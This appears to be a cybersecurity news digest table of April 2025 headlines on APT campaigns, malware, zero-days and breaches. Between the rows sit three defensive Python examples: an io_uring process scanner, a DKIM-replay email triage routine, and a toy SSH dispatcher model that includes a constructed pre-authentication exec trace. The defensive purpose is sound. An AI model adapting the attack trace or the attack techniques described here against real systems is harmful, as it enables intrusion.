DATE | NAME | Info | CATEG. | WEB |
24.4.25 | Lazarus Hits 6 South Korean Firms via Cross EX, Innorix Zero-Day and ThreatNeedle Malware | At least six organizations in South Korea have been targeted by the prolific North Korea-linked Lazarus Group as part of a campaign dubbed Operation SyncHole . | APT | The Hacker News |
24.4.25 | Linux io_uring PoC Rootkit Bypasses System Call-Based Threat Detection Tools | Cybersecurity researchers have demonstrated a proof-of-concept (PoC) rootkit dubbed Curing that leverages a Linux asynchronous I/O mechanism called io_uring | Virus | The Hacker News |
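The defensive point behind the Curing PoC is that an EDR which only hooks the classic syscalls (read, write, connect) never sees I/O submitted through an io_uring ring. The following host check is an added example, not code from the original article or from the PoC: it lists every process holding an io_uring instance (the fd shows up in /proc as `anon_inode:[io_uring]`) and reports the `kernel.io_uring_disabled` sysctl, which only exists on Linux 6.6 and later; `proc_root` is a parameter so the scan can be pointed at a copied procfs.

```python
"""Hunt for io_uring use on a Linux host.

Added example, not code from the original page and not from the Curing PoC.
A detection stack that only hooks the classic syscalls (read, write, connect,
...) cannot see I/O that a process submits through an io_uring ring, so the
defensive questions are: which processes hold a ring at all, and does the
kernel allow unprivileged io_uring (kernel.io_uring_disabled, Linux 6.6+)?
"""
import os
from typing import Dict, Optional

IO_URING_LINK = "anon_inode:[io_uring]"             # readlink() target of an io_uring fd
SYSCTL_PATH = "/proc/sys/kernel/io_uring_disabled"  # absent on kernels before 6.6


def is_io_uring_fd(link_target: str) -> bool:
    """True if a /proc/<pid>/fd/<n> symlink points at an io_uring instance."""
    return link_target == IO_URING_LINK


def io_uring_policy(sysctl_value: Optional[str]) -> str:
    """Translate kernel.io_uring_disabled into words (0 open, 1 restricted, 2 off)."""
    if sysctl_value is None:
        return "unknown (sysctl absent: kernel older than 6.6)"
    value = sysctl_value.strip()
    return {
        "0": "allowed for every process",
        "1": "restricted to CAP_SYS_ADMIN or members of kernel.io_uring_group",
        "2": "disabled",
    }.get(value, "unexpected value " + repr(value))


def scan_proc(proc_root: str = "/proc") -> Dict[int, str]:
    """Return {pid: comm} for every process holding at least one io_uring fd.

    Permission errors (other users' fd tables) are skipped silently, so run
    as root for a complete picture.
    """
    hits: Dict[int, str] = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        fd_dir = os.path.join(proc_root, entry, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:            # process exited, or fd table not readable
            continue
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            if is_io_uring_fd(target):
                try:
                    with open(os.path.join(proc_root, entry, "comm")) as fh:
                        comm = fh.read().strip()
                except OSError:
                    comm = "?"
                hits[int(entry)] = comm
                break
    return hits


def read_sysctl(path: str = SYSCTL_PATH) -> Optional[str]:
    try:
        with open(path) as fh:
            return fh.read()
    except OSError:
        return None


if __name__ == "__main__":
    print("io_uring policy:", io_uring_policy(read_sysctl()))
    for pid, comm in sorted(scan_proc().items()):
        print("pid %7d  %-16s holds an io_uring instance" % (pid, comm))
```

A hit is a lead, not a verdict: databases, runtimes and backup agents use io_uring legitimately, so baseline the list before alerting on it. Setting `kernel.io_uring_disabled=2` (or 1 plus an allow-group) is the blunt mitigation where nothing on the host needs the interface.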
24.4.25 | Darcula Adds GenAI to Phishing Toolkit, Lowering the Barrier for Cybercriminals | The threat actors behind the Darcula phishing-as-a-service ( PhaaS ) platform have released new updates to their cybercrime suite with generative artificial intelligence | AI | The Hacker News |
24.4.25 | Critical Commvault Command Center Flaw Enables Attackers to Execute Code Remotely | A critical security flaw has been disclosed in the Commvault Command Center that could allow arbitrary code execution on affected installations. The vulnerability, | Vulnerability | The Hacker News |
24.4.25 | WhatsApp Adds Advanced Chat Privacy to Block Chat Exports and Auto-Downloads | WhatsApp has introduced an extra layer of privacy called Advanced Chat Privacy that allows users to block participants from sharing the contents of a conversation | Social | The Hacker News |
24.4.25 | DPRK Hackers Steal $137M from TRON Users in Single-Day Phishing Attack | Multiple threat activity clusters with ties to North Korea (aka Democratic People's Republic of Korea or DPRK) have been linked to attacks targeting organizations and | APT | The Hacker News |
23.4.25 | Iran-Linked Hackers Target Israel with MURKYTOUR Malware via Fake Job Campaign | The Iran-nexus threat actor known as UNC2428 has been observed delivering a backdoor known as MURKYTOUR as part of a job-themed social engineering | APT | The Hacker News |
23.4.25 | Android Spyware Disguised as Alpine Quest App Targets Russian Military Devices | Cybersecurity researchers have revealed that Russian military personnel are the target of a new malicious campaign that distributes Android spyware under the | Virus | The Hacker News |
23.4.25 | Russian Hackers Exploit Microsoft OAuth to Target Ukraine Allies via Signal and WhatsApp | Multiple suspected Russia-linked threat actors are "aggressively" targeting individuals and organizations with ties to Ukraine and human rights with an aim to | Exploit | The Hacker News |
23.4.25 | Ripple's xrpl.js npm Package Backdoored to Steal Private Keys in Major Supply Chain Attack | The Ripple cryptocurrency npm JavaScript library named xrpl.js has been compromised by unknown threat actors as part of a software supply chain attack | Hack | The Hacker News |
23.4.25 | Google Drops Cookie Prompt in Chrome, Adds IP Protection to Incognito | Google on Tuesday revealed that it will no longer offer a standalone prompt for third-party cookies in its Chrome browser as part of its Privacy Sandbox initiative. | Security | The Hacker News |
23.4.25 | Docker Malware Exploits Teneo Web3 Node to Earn Crypto via Fake Heartbeat Signals | Cybersecurity researchers have detailed a malware campaign that's targeting Docker environments with a previously undocumented technique to mine | Exploit | The Hacker News |
22.4.25 | GCP Cloud Composer Bug Let Attackers Elevate Access via Malicious PyPI Packages | Cybersecurity researchers have detailed a now-patched vulnerability in Google Cloud Platform (GCP) that could have enabled an attacker to elevate their privileges | Vulnerability | The Hacker News |
22.4.25 | Phishers Exploit Google Sites and DKIM Replay to Send Signed Emails, Steal Credentials | In what has been described as an "extremely sophisticated phishing attack," threat actors have leveraged an uncommon approach that allowed bogus emails to be | Exploit | The Hacker News |
22.4.25 | Microsoft Secures MSA Signing with Azure Confidential VMs Following Storm-0558 Breach | Microsoft on Monday announced that it has moved the Microsoft Account (MSA) signing service to Azure confidential virtual machines (VMs) and that it's also in the process of migrating the Entra ID signing service as well. | APT | The Hacker News |
22.4.25 | Lotus Panda Hacks SE Asian Governments With Browser Stealers and Sideloaded Malware | The China-linked cyber espionage group tracked as Lotus Panda has been attributed to a campaign that compromised multiple organizations in an unnamed | APT | The Hacker News |
22.4.25 | Kimsuky Exploits BlueKeep RDP Vulnerability to Breach Systems in South Korea and Japan | Cybersecurity researchers have flagged a new malicious campaign related to the North Korean state-sponsored threat actor known as Kimsuky that exploits a now- | APT | The Hacker News |
22.4.25 | Majority of Browser Extensions Can Access Sensitive Enterprise Data, New Report Finds | Everybody knows browser extensions are embedded into nearly every user's daily workflow, from spell checkers to GenAI tools. What most IT and security people | AI | The Hacker News |
22.4.25 | SuperCard X Android Malware Enables Contactless ATM and PoS Fraud via NFC Relay Attacks | A new Android malware-as-a-service (MaaS) platform named SuperCard X can facilitate near-field communication ( NFC ) relay attacks, enabling cybercriminals to | Virus | The Hacker News |
22.4.25 | Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery | Cybersecurity researchers have disclosed a surge in "mass scanning, credential brute-forcing, and exploitation attempts" originating from IP addresses associated | APT | The Hacker News |
21.4.25 | Phishers abuse Google OAuth to spoof Google in DKIM replay attack | In a rather clever attack, hackers leveraged a weakness that allowed them to send a fake email that seemed delivered from Google's systems, passing all verifications but pointing to a fraudulent page that collected logins. | Phishing | |
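The two DKIM-replay items above (the Google Sites / OAuth campaign) share one mechanism: the message really was signed by the provider, it was just sent to the attacker's own mailbox first and then forwarded unchanged, so DKIM (and DMARC, which keys off the aligned d=) still pass at the victim. What the replay cannot rewrite is the envelope and the delivery path. The triage below is an added example in Python using only the standard library, not the article's or any provider's filter; the message is a constructed sample, the relay and victim domains are placeholders, and the 24-hour staleness threshold is an assumption.

```python
"""Triage heuristics for a DKIM replay: a genuinely signed message re-sent to
someone it was never addressed to.

Added example, not the original article's code and not a mail-provider filter.
The replayed message keeps a valid signature for d= because the signed headers
and body are untouched; the checks below look at what a replay cannot change:
the signed recipients, the envelope sender, the last hop and the signing time.
"""
import email
import re
from datetime import datetime, timezone
from email.utils import getaddresses, parseaddr, parsedate_to_datetime
from typing import List, Tuple

STALE_HOURS = 24.0   # assumption: how old a signature may be before we call it replayed


def parse_dkim_tags(value: str) -> dict:
    """Split a DKIM-Signature header into tag -> value, folding whitespace removed."""
    tags = {}
    for part in value.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            tags[key.strip()] = "".join(val.split())
    return tags


def in_domain(host: str, domain: str) -> bool:
    host, domain = host.lower().rstrip("."), domain.lower()
    return bool(domain) and (host == domain or host.endswith("." + domain))


def last_hop_host(received: str) -> str:
    """Host the final MX accepted the message from: the 'from X' clause of the top Received."""
    match = re.search(r"\bfrom\s+([A-Za-z0-9.-]+)", received.replace("\n", " "))
    return match.group(1) if match else ""


def replay_indicators(raw: bytes, delivered_to: str) -> List[Tuple[str, str]]:
    """Return (code, detail) findings; an empty list means nothing replay-like was seen."""
    msg = email.message_from_bytes(raw)
    dkim = msg.get("DKIM-Signature")
    if not dkim:
        return [("no-dkim", "message carries no DKIM-Signature")]
    tags = parse_dkim_tags(dkim)
    signer = tags.get("d", "")
    findings: List[Tuple[str, str]] = []

    # 1. The signed To:/Cc: never named the mailbox this copy landed in.
    rcpts = [addr.lower() for _, addr in getaddresses(msg.get_all("To", []) + msg.get_all("Cc", []))]
    if delivered_to.lower() not in rcpts:
        findings.append(("recipient-not-signed", "delivered to %s, signed To/Cc %s" % (delivered_to, rcpts)))

    # 2. Envelope sender is not under the signing domain (SPF may still pass for the relay).
    env_domain = parseaddr(msg.get("Return-Path", ""))[1].rpartition("@")[2]
    if env_domain and not in_domain(env_domain, signer):
        findings.append(("envelope-domain-mismatch", "Return-Path %s vs d=%s" % (env_domain, signer)))

    # 3. The host that handed us the message is outside the signer's infrastructure.
    received = msg.get_all("Received", [])
    hop = last_hop_host(received[0]) if received else ""
    if hop and not in_domain(hop, signer):
        findings.append(("last-hop-outside-signer", "final hop from %s, d=%s" % (hop, signer)))

    # 4. The signature is much older than final delivery: signed then, replayed now.
    if received and tags.get("t", "").isdigit():
        signed_at = datetime.fromtimestamp(int(tags["t"]), tz=timezone.utc)
        arrived = parsedate_to_datetime(received[0].rpartition(";")[2].strip())
        age_h = (arrived - signed_at).total_seconds() / 3600
        if age_h > STALE_HOURS:
            findings.append(("stale-signature", "signed %.0f h before the final hop" % age_h))
    return findings


# Constructed sample: a provider-signed alert, originally sent to the attacker's own
# mailbox, forwarded unchanged through an unrelated relay to a victim a week later.
SAMPLE = b"""Return-Path: <bounce@relay-example.test>
Received: from fwd.relay-example.test (fwd.relay-example.test [203.0.113.7])
\tby mx.victim-example.test with ESMTPS; Sat, 19 Apr 2025 10:00:00 +0000
Received: from mail-sor.google.com (mail-sor.google.com [192.0.2.9])
\tby fwd.relay-example.test; Sat, 12 Apr 2025 23:30:00 +0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=selector;
\th=from:to:subject:date; t=1744500000; bh=PLACEHOLDER; b=PLACEHOLDER
From: Google <no-reply@accounts.google.com>
To: me@attacker-example.test
Subject: Security alert
Date: Sat, 12 Apr 2025 23:20:00 +0000

Constructed body; in the real campaign the lure text lived in the signed content.
"""

if __name__ == "__main__":
    for code, detail in replay_indicators(SAMPLE, "victim@victim-example.test"):
        print(code, "-", detail)
```

These are triage signals, not a verdict: a mailing list or a user's own auto-forward trips the first three checks too, so combine them with the signer identity (a provider's own security alert arriving via a third-party relay is the odd case) rather than blocking on any single one.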
21.4.25 | State-sponsored hackers embrace ClickFix social engineering tactic | ClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks. | APT | |
21.4.25 | Widespread Microsoft Entra lockouts tied to new security feature rollout | Windows administrators from numerous organizations report widespread account lockouts triggered by false positives in the rollout of a new Microsoft Entra ID's "leaked credentials" detection app called MACE. | OS | BleepingComputer |
21.4.25 | New Android malware steals your credit cards for NFC relay attacks | A new malware-as-a-service (MaaS) platform named 'SuperCard X' has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data. | Virus | BleepingComputer |
21.4.25 | Critical Erlang/OTP SSH RCE bug now has public exploits, patch now | Public exploits are now available for a critical Erlang/OTP SSH vulnerability tracked as CVE-2025-32433, allowing unauthenticated attackers to remotely execute code on impacted devices. | Exploit | |
21.4.25 | Google Gemini AI is getting ChatGPT-like Scheduled Actions feature | Google Gemini is testing a ChatGPT-like scheduled tasks feature called "Scheduled Actions," which will allow you to create tasks that Gemini will execute later. | AI | BleepingComputer |
21.4.25 | Interlock ransomware gang pushes fake IT tools in ClickFix attacks | The Interlock ransomware gang now uses ClickFix attacks that impersonate IT tools to breach corporate networks and deploy file-encrypting malware on devices. | Ransom | |
21.4.25 | FBI: Scammers pose as FBI IC3 employees to 'help' recover lost funds | The FBI warns that scammers posing as FBI IC3 employees are offering to "help" fraud victims recover money lost to other scammers. | Spam | |
21.4.25 | ASUS warns of critical auth bypass flaw in routers using AiCloud | ASUS is warning about an authentication bypass vulnerability in routers with AiCloud enabled that could allow remote attackers to perform unauthorized execution of functions on the device. | Vulnerability | |
21.4.25 | SonicWall SMA VPN devices targeted in attacks since January | A remote code execution vulnerability affecting SonicWall Secure Mobile Access (SMA) appliances has been under active exploitation since at least January 2025, according to cybersecurity company Arctic Wolf. | Vulnerability | |
21.4.25 | Chinese hackers target Russian govt with upgraded RAT malware | Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organizations using upgraded MysterySnail remote access trojan (RAT) malware. | Virus | BleepingComputer |
21.4.25 | 7 Steps to Take After a Credential-Based cyberattack | Hackers don't break in—they log in. Credential-based attacks now fuel nearly half of all breaches. Learn how to scan your Active Directory for compromised passwords and stop attackers before they strike. | Cyber | BleepingComputer |
21.4.25 | Cisco Webex bug lets hackers gain code execution via meeting links | Cisco has released security updates for a high-severity Webex vulnerability that allows unauthenticated attackers to gain client-side remote code execution using malicious meeting invite links. | Vulnerability | BleepingComputer |
21.4.25 | Critical Erlang/OTP SSH pre-auth RCE is 'Surprisingly Easy' to exploit, patch now | A critical vulnerability in the Erlang/OTP SSH, tracked as CVE-2025-32433, has been disclosed that allows for unauthenticated remote code execution on vulnerable devices. | Exploit | |
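Both Erlang/OTP items above describe a pre-authentication RCE, which in an SSH server is a state-machine bug: RFC 4253/4252 require key exchange and user authentication to complete before any connection-protocol message (RFC 4254: CHANNEL_OPEN, CHANNEL_REQUEST, message numbers 80 to 127) is honoured, and a dispatcher that routes on the message number alone will run an "exec" request for a peer that never authenticated. The model below is an added example in Python, not Erlang/OTP code and not the CVE-2025-32433 exploit; the two dispatchers share every handler and differ only in the state check, and the channel ids, credentials and commands in the traces are constructed toy values.

```python
"""Pre-auth RCE in an SSH server as a state-machine bug: two dispatchers that
share every handler and differ only in one check.

Added example, not Erlang/OTP code and not the CVE-2025-32433 exploit.
"""
from typing import Callable, FrozenSet, List, Tuple

# Message numbers from RFC 4250 section 4.1
MSG_KEXINIT = 20
MSG_NEWKEYS = 21
MSG_USERAUTH_REQUEST = 50
MSG_CHANNEL_OPEN = 90
MSG_CHANNEL_REQUEST = 98
CONNECTION_MSGS = range(80, 128)        # the whole connection-protocol range


class Session:
    def __init__(self) -> None:
        self.state = "kex"              # kex -> auth -> connected
        self.channels: set = set()
        self.executed: List[str] = []   # commands the server actually ran


def _connection_handler(s: Session, num: int, payload) -> str:
    """Connection protocol: open channels, honour 'exec' requests on open channels."""
    if num == MSG_CHANNEL_OPEN:
        s.channels.add(payload)         # payload: peer channel id (toy model)
        return "channel-opened"
    if num == MSG_CHANNEL_REQUEST:
        chan, req_type, data = payload
        if chan in s.channels and req_type == "exec":
            s.executed.append(data)
            return "executed"
        return "request-ignored"
    return "unhandled"


def _auth_handler(s: Session, num: int, payload, valid: FrozenSet) -> str:
    """User auth: payload is a (user, secret) tuple in this toy model."""
    if num == MSG_USERAUTH_REQUEST:
        if payload in valid:
            s.state = "connected"
            return "auth-success"
        return "auth-failure"
    return "unhandled"


def vulnerable_dispatch(s: Session, num: int, payload, valid: FrozenSet = frozenset()) -> str:
    """Routes purely on message number: connection messages are served in any state."""
    if num in (MSG_KEXINIT, MSG_NEWKEYS):
        s.state = "auth"
        return "kex"
    if num in CONNECTION_MSGS:
        return _connection_handler(s, num, payload)
    return _auth_handler(s, num, payload, valid)


def hardened_dispatch(s: Session, num: int, payload, valid: FrozenSet = frozenset()) -> str:
    """Same handlers, but connection-protocol messages require state == connected."""
    if num in (MSG_KEXINIT, MSG_NEWKEYS):
        s.state = "auth"
        return "kex"
    if num in CONNECTION_MSGS:
        if s.state != "connected":
            return "disconnect:protocol-error"   # SSH_DISCONNECT_PROTOCOL_ERROR, RFC 4253 11.1
        return _connection_handler(s, num, payload)
    if s.state == "kex":                         # no auth before key exchange completes either
        return "disconnect:protocol-error"
    return _auth_handler(s, num, payload, valid)


def run(dispatch: Callable, messages: List[Tuple[int, object]], valid: FrozenSet = frozenset()):
    """Feed a message trace to a dispatcher; stop at the first disconnect."""
    s = Session()
    results: List[str] = []
    for num, payload in messages:
        result = dispatch(s, num, payload, valid)
        results.append(result)
        if result.startswith("disconnect"):
            break
    return s, results


# Constructed traces. The attack trace goes straight from key exchange to the
# connection protocol without a single USERAUTH_REQUEST.
PRE_AUTH_EXEC = [
    (MSG_KEXINIT, None), (MSG_NEWKEYS, None),
    (MSG_CHANNEL_OPEN, 0),
    (MSG_CHANNEL_REQUEST, (0, "exec", "id")),
]
LEGIT = [
    (MSG_KEXINIT, None), (MSG_NEWKEYS, None),
    (MSG_USERAUTH_REQUEST, ("alice", "correct-horse")),
    (MSG_CHANNEL_OPEN, 0),
    (MSG_CHANNEL_REQUEST, (0, "exec", "uptime")),
]
VALID = frozenset({("alice", "correct-horse")})

if __name__ == "__main__":
    for name, dispatch in (("vulnerable", vulnerable_dispatch), ("hardened", hardened_dispatch)):
        s, results = run(dispatch, PRE_AUTH_EXEC)
        print(name, results, "ran:", s.executed)
```

The operational takeaway is the same as the articles': until the fix is deployed, an exposed Erlang SSH listener needs network-level restriction, because the bug sits before any credential is checked and no password policy helps.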
21.4.25 | Entertainment services giant Legends International discloses data breach | Entertainment venue management firm Legends International warns it suffered a data breach in November 2024, which has impacted employees and people who visited venues under its management. | Incident | BleepingComputer |
21.4.25 | Windows NTLM hash leak flaw exploited in phishing attacks on governments | A Windows vulnerability that exposes NTLM hashes using .library-ms files is now actively exploited by hackers in phishing campaigns targeting government entities and private companies. | Phishing | BleepingComputer |
21.4.25 | Chrome extensions with 6 million installs have hidden tracking code | A set of 57 Chrome extensions with 6,000,000 users have been discovered with very risky capabilities, such as monitoring browsing behavior, accessing cookies for domains, and potentially executing remote scripts. | Security | BleepingComputer |
21.4.25 | Ahold Delhaize confirms data theft after INC ransomware claims attack | Food retail giant Ahold Delhaize confirms that data was stolen from its U.S. business systems during a November 2024 cyberattack. | Ransom | BleepingComputer |
21.4.25 | APT29 Deploys GRAPELOADER Malware Targeting European Diplomats Through Wine-Tasting Lures | The Russian state-sponsored threat actor known as APT29 has been linked to an advanced phishing campaign that's targeting diplomatic entities across Europe with | APT | The Hacker News |
20.4.25 | CTM360 Tracks Global Surge in SMS-Based Reward and Toll Scams | Thousands tricked by fake reward & toll scam texts. CTM360 exposes PointyPhish & TollShark—SMS phishing campaigns powered by the Darcula PhaaS platform, with 5K+ domains stealing payment info worldwide. | Spam | |
20.4.25 | Microsoft: Office 2016 and Office 2019 reach end of support in October | Microsoft has reminded customers that Office 2016 and Office 2019 will reach the end of extended support six months from now, on October 14, 2025. | Security | BleepingComputer |
20.4.25 | CISA warns of increased breach risks following Oracle Cloud leak | On Wednesday, CISA warned of heightened breach risks after the compromise of legacy Oracle Cloud servers earlier this year and highlighted the significant threat to enterprise networks. | Incident | |
20.4.25 | New Windows Server emergency updates fix container launch issue | Microsoft has released emergency Windows Server updates to address a known issue preventing Windows containers from launching. | Vulnerability | |
20.4.25 | CISA tags SonicWall VPN flaw as actively exploited in attacks | On Wednesday, CISA warned federal agencies to secure their SonicWall Secure Mobile Access (SMA) 100 series appliances against attacks exploiting a high-severity remote code execution vulnerability. | Exploit | |
20.4.25 | Over 16,000 Fortinet devices compromised with symlink backdoor | Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices. | Virus | |
20.4.25 | Apple fixes two zero-days exploited in targeted iPhone attacks | Apple released emergency security updates to patch two zero-day vulnerabilities that were used in an "extremely sophisticated attack" against specific targets' iPhones. | Vulnerebility | BleepingComputer |
20.4.25 | Jira Down: Atlassian users experiencing degraded performance | Atlassian users are experiencing degraded performance amid an 'active incident' affecting multiple Jira products since morning hours today. Jira, Jira Service Management, Jira Work Management and Jira Product Discovery are among the impacted products. | Security | BleepingComputer |
20.4.25 | 41% of Attacks Bypass Defenses: Adversarial Exposure Validation Fixes That | Your dashboards say you're secure—but 41% of threats still get through. Picus Security's Adversarial Exposure Validation uncovers what your stack is missing with continuous attack simulations and automated pentesting. | Security | |
20.4.25 | CISA extends funding to ensure 'no lapse in critical CVE services' | CISA says the U.S. government has extended MITRE's funding to ensure no continuity issues with the critical Common Vulnerabilities and Exposures (CVE) program. | Security | BleepingComputer |
20.4.25 | Microsoft warns of blue screen crashes caused by April updates | Microsoft warned customers this week that their systems might crash with a blue screen error caused by a secure kernel fatal error after installing Windows updates released since March. | OS | BleepingComputer |
20.4.25 | Microsoft: Some devices offered Windows 11 upgrades despite Intune blocks | Microsoft is working to fix an ongoing issue causing some users' Windows devices to be offered Windows 11 upgrades despite Intune policies preventing them. | OS | BleepingComputer |
20.4.25 | MITRE warns that funding for critical CVE program expires today | MITRE Vice President Yosry Barsoum has warned that U.S. government funding for the Common Vulnerabilities and Exposures (CVE) and Common Weakness Enumeration (CWE) programs expires today, which could lead to widespread disruption across the global cybersecurity industry. | Security | |
20.4.25 | Midnight Blizzard deploys new GrapeLoader malware in embassy phishing | Russian state-sponsored espionage group Midnight Blizzard is behind a new spear-phishing campaign targeting diplomatic entities in Europe, including embassies. | APT | |
20.4.25 | Landmark Admin data breach impact now reaches 1.6 million people | Landmark Admin has issued an update to its investigation of a cyberattack it suffered in May 2024, increasing the number of impacted individuals to 1.6 million. | Incident | |
20.4.25 | Infamous message board 4chan taken down following major hack | 4chan, a notorious online forum, was taken offline earlier today after what appears to be a significant hack and has since been loading intermittently. | Hack | |
20.4.25 | Microsoft blocks ActiveX by default in Microsoft 365, Office 2024 | Microsoft announced it will begin disabling all ActiveX controls in Windows versions of Microsoft 365 and Office 2024 applications later this month. | OS | BleepingComputer |
20.4.25 | Microsoft: Exchange 2016 and 2019 reach end of support in six months | Microsoft warned that Exchange 2016 and Exchange 2019 will reach the end of support six months from now, on October 14. | OS | BleepingComputer |
20.4.25 | Google adds Android auto-reboot to block forensic data extractions | Google is rolling out a new security mechanism on Android devices that will automatically reboot locked, unused devices after three consecutive days of inactivity, restoring memory to an encrypted state. | OS | |
20.4.25 | Microsoft warns of CPU spikes when typing in classic Outlook | Microsoft warned Windows users of increased CPU usage when typing while using recent versions of the classic Outlook email client. | OS | BleepingComputer |
20.4.25 | Hertz confirms customer info, drivers' licenses stolen in data breach | Car rental giant Hertz Corporation warns it suffered a data breach after customer data for its Hertz, Thrifty, and Dollar brands was stolen in the Cleo zero-day data theft attacks. | Incident | BleepingComputer |
20.4.25 | Govtech giant Conduent confirms client data stolen in January cyberattack | American business services giant and government contractor Conduent disclosed today that client data was stolen in a January 2025 cyberattack. | Incident | BleepingComputer |
20.4.25 | Rogue npm Packages Mimic Telegram Bot API to Plant SSH Backdoors on Linux Systems | Cybersecurity researchers have uncovered three malicious packages in the npm registry that masquerade as a popular Telegram bot library but harbor SSH | Virus | The Hacker News |
20.4.25 | Cybersecurity firm buying hacker forum accounts to spy on cybercriminals | Swiss cybersecurity firm Prodaft has launched a new initiative called 'Sell your Source' where the company purchases verified and aged accounts on hacking forums to spy on cybercriminals. | Security | |
20.4.25 | SSL/TLS certificate lifespans reduced to 47 days by 2029 | The CA/Browser Forum has voted to significantly reduce the lifespan of SSL/TLS certificates over the next 4 years, with a final lifespan of just 47 days starting in 2029. | Security | BleepingComputer |
20.4.25 | New ResolverRAT malware targets pharma and healthcare orgs worldwide | A new remote access trojan (RAT) called 'ResolverRAT' is being used against organizations globally, with the malware used in recent attacks targeting the healthcare and pharmaceutical sectors. | Virus | |
20.4.25 | Meta to resume AI training on content shared by Europeans | Meta announced today that it will soon start training its artificial intelligence models using content shared by European adult users on its Facebook and Instagram social media platforms. | AI | |
20.4.25 | Kidney dialysis firm DaVita hit by weekend ransomware attack | Kidney dialysis firm DaVita disclosed Monday it suffered a weekend ransomware attack that encrypted parts of its network and impacted some of its operations. | Ransom | |
20.4.25 | Enhancing your DevSecOps with Wazuh, the open source XDR platform | Security shouldn't wait until the end of development. Wazuh brings real-time threat detection, compliance, and vulnerability scanning into your DevOps pipeline—powering a stronger DevSecOps strategy from day one. Learn more about how Wazuh can help secure your development cycle. | Security | |
20.4.25 | Microsoft tells Windows users to ignore 0x80070643 WinRE errors | Microsoft says some users might see 0x80070643 installation failures when trying to deploy the April 2025 Windows Recovery Environment (WinRE) updates. | OS | BleepingComputer |
20.4.25 | Microsoft: New Windows updates fix Active Directory policy issues | Microsoft has released emergency Windows updates to address a known issue affecting local audit logon policies in Active Directory Group Policy. | OS | BleepingComputer |
20.4.25 | OpenAI's GPT-4.1, 4.1 nano, and 4.1 mini models release imminent | According to references spotted on OpenAI's website, the Microsoft-backed AI startup is planning to launch five new models this week, including GPT-4.1, 4.1 nano, and 4.1 mini. | AI | |
20.4.25 | Microsoft: Windows Server 2025 restarts break connectivity on some DCs | Microsoft warned IT admins that some Windows Server 2025 domain controllers might become inaccessible after a restart, causing apps and services to fail or remain unreachable. | OS | BleepingComputer |
20.4.25 | Chrome 136 fixes 20-year browser history privacy risk | Google is fixing a long-standing privacy issue that, for years, enabled websites to determine users' browsing history through the previously visited links. | Vulnerability | BleepingComputer |
19.4.25 | | We discovered China-nexus threat actors deployed custom backdoors on Juniper Networks’ Junos OS routers. | APT blog | Google Threat Intelligence |
19.4.25 | Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger | Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia's intelligence services. | Social blog | Google Threat Intelligence |
19.4.25 | | Cyber Attack Surge: In Q1 2025, cyber attacks per organization increased by 47%, reaching an ... | Cyber blog | Checkpoint |
19.4.25 | | Executive Summary Check Point Research has been observing a sophisticated phishing campaign conducted by Advanced ... | APT blog | Checkpoint |
19.4.25 | Hacktivists Target Critical Infrastructure, Move Into Ransomware | Hacktivists are increasingly adopting more sophisticated - and destructive - attack types. | Ransom blog | Cyble |
19.4.25 | DOGE "Big Balls" Ransomware and the False Connection to Edward Coristine | Cyble investigates the DOGE BIG BALLS Ransomware, analyzing its operation and the false ties made to... | Ransom blog | Cyble |
19.4.25 | APT PROFILE – EARTH ESTRIES | Earth Estries is a Chinese Advanced Persistent Threat (APT) group that has gained prominence for its sophisticated cyber espionage activities targeting critical infrastructure and | APT blog | Cyfirma |
19.4.25 | Fortnightly Vulnerability Summary | Fast facts on the vulnerabilities observed over the past fortnight; most impacted products: Linux, ColdFusion, FrameMaker. | Vulnerability blog | Cyfirma |
19.4.25 | Cyber Espionage Among Allies: Strategic Posturing in an Era of Trade Tensions | Executive Summary In the past decade, a pattern of cyber operations and espionage between the United States and its allies has emerged, complicating relationships traditionally | APT blog | Cyfirma |
19.4.25 | SCAMONOMICS THE DARK SIDE OF STOCK & CRYPTO INVESTMENTS IN INDIA | EXECUTIVE SUMMARY At CYFIRMA, we are committed to offering up-to-date insights into prevalent threats and tactics employed by malicious actors targeting both organizations | Cryptocurrency blog | Cyfirma |
19.4.25 | The Top Firmware and Hardware Attack Vectors | As firmware-level threats continue to gain popularity in the wild, security teams need to understand how these threats work and the real-world risks they pose to an organization’s security. | Attack blog | Eclypsium |
19.4.25 | Revolutionizing Your SOC: Welcome to Threat Protection Workbench | Email remains the number one threat vector in today’s cyber landscape, responsible for more than 90% of successful cyberattacks. As the volume and sophistication of email threats grow, security operations center (SOC) teams are under constant pressure to investigate and respond to incidents more quickly. Even with strong detection, the sheer number of alerts and investigation steps can slow down response times and strain already limited resources—leading to fatigue and increasing the risk of missed threats. | Security blog | PROOFPOINT |
19.4.25 | Around the World in 90 Days: State-Sponsored Actors Try ClickFix | While primarily a technique affiliated with cybercriminal actors, Proofpoint researchers discovered state-sponsored actors in multiple campaigns using the ClickFix social engineering technique for the first time. | Malware blog | PROOFPOINT |
19.4.25 | The Expanding Attack Surface: Ways That Attackers Compromise Trusted Business Communications | The modern workplace has expanded beyond email. Attackers now exploit collaboration tools, supplier relationships and human trust to bypass defenses and compromise accounts. This five-part blog series raises awareness around these shifting attack tactics. And it introduces our holistic approach to protecting users. | Attack blog | PROOFPOINT |
19.4.25 | Cybersecurity Stop of the Month: Bitcoin Scam—How Cybercriminals Lure Victims with Free Crypto to Steal Credentials and Funds | In recent years, cryptocurrency has grown from a niche interest into a mainstream financial ecosystem. This evolution, however, hasn’t been without drawbacks. Namely, it has attracted cybercriminals who use the allure of digital wealth to perpetrate sophisticated fraud schemes. In 2023, illicit crypto addresses received at least $46.1 billion, up from $24.2 billion. This underscores how rapidly crypto-related crimes are spreading. | Cryptocurrency blog | PROOFPOINT |
